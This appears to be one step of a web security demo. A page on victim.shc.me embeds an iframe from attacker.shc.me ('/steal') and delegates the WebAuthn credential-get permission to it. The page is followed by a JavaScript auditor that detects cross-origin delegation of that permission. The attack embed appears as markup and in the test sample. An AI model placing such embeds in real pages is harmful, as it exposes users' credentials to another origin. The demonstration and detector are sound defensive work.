Step 3: Attack Page

What's happening:

This page on victim.shc.me embeds a cross-origin iframe from attacker.shc.me and delegates the publickey-credentials-get Permissions Policy feature to it through the iframe's allow attribute.

The attacker iframe will request credentials using the combined WebAuthn + Password path.

<iframe src="https://attacker.shc.me/steal" allow="publickey-credentials-get"></iframe>

[The live cross-origin iframe from attacker.shc.me is embedded here.]
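
A defender-side check for the embed shown above, as an added example that is not part of the original demo: it scans markup for iframes whose allow attribute hands publickey-credentials-get to a different origin. The function names, the sample markup and the page URL path are constructed for illustration, and the regex-based tag extraction is a simplification of what a DOM parser would do.

```javascript
// Added example, not from the original demo: flag iframes whose `allow`
// attribute delegates a Permissions Policy feature to another origin.
const FEATURE = 'publickey-credentials-get';

// Does a directive's allowlist cover the framed origin? In an `allow`
// attribute an empty allowlist means 'src' (the origin of the frame's src).
function allowlistMatches(tokens, frameOrigin, pageOrigin) {
  if (tokens.length === 0) tokens = ["'src'"];
  return tokens.some((t) => {
    if (t === '*' || t === "'src'") return true;
    if (t === "'none'") return false;
    if (t === "'self'") return frameOrigin === pageOrigin;
    try { return new URL(t).origin === frameOrigin; } catch { return false; }
  });
}

// Parse "feature allowlist; feature allowlist; ..." and test one feature.
function delegates(allowAttr, feature, frameOrigin, pageOrigin) {
  return allowAttr.split(';').some((directive) => {
    const [name, ...tokens] = directive.trim().split(/\s+/);
    return name === feature && allowlistMatches(tokens, frameOrigin, pageOrigin);
  });
}

// Static review of markup. Origins are compared as scheme + host + port,
// so sibling subdomains such as victim.* and attacker.* are cross-origin.
function auditIframes(html, pageUrl, feature = FEATURE) {
  const pageOrigin = new URL(pageUrl).origin;
  const findings = [];
  for (const [tag] of html.matchAll(/<iframe\b[^>]*>/gi)) {
    const attrs = {};
    for (const [, k, , v] of tag.matchAll(/([\w-]+)\s*=\s*(["'])(.*?)\2/g)) {
      attrs[k.toLowerCase()] = v;
    }
    if (!attrs.src || !attrs.allow) continue;
    const frameOrigin = new URL(attrs.src, pageUrl).origin;
    if (frameOrigin !== pageOrigin &&
        delegates(attrs.allow, feature, frameOrigin, pageOrigin)) {
      findings.push({ frameOrigin, allow: attrs.allow });
    }
  }
  return findings;
}

// Constructed sample: the page's embed plus three variants for comparison.
const SAMPLE = `
<iframe src="https://attacker.shc.me/steal" allow="publickey-credentials-get"></iframe>
<iframe src="/widget" allow="publickey-credentials-get"></iframe>
<iframe src="https://attacker.shc.me/steal" allow="publickey-credentials-get 'self'"></iframe>
<iframe src="https://attacker.shc.me/steal" allow="fullscreen; publickey-credentials-get *"></iframe>`;
console.log(auditIframes(SAMPLE, 'https://victim.shc.me/'));
```

Only the first and last sample frames are reported: the same-origin widget is not a cross-origin delegation, and an allowlist of 'self' does not extend the feature to attacker.shc.me.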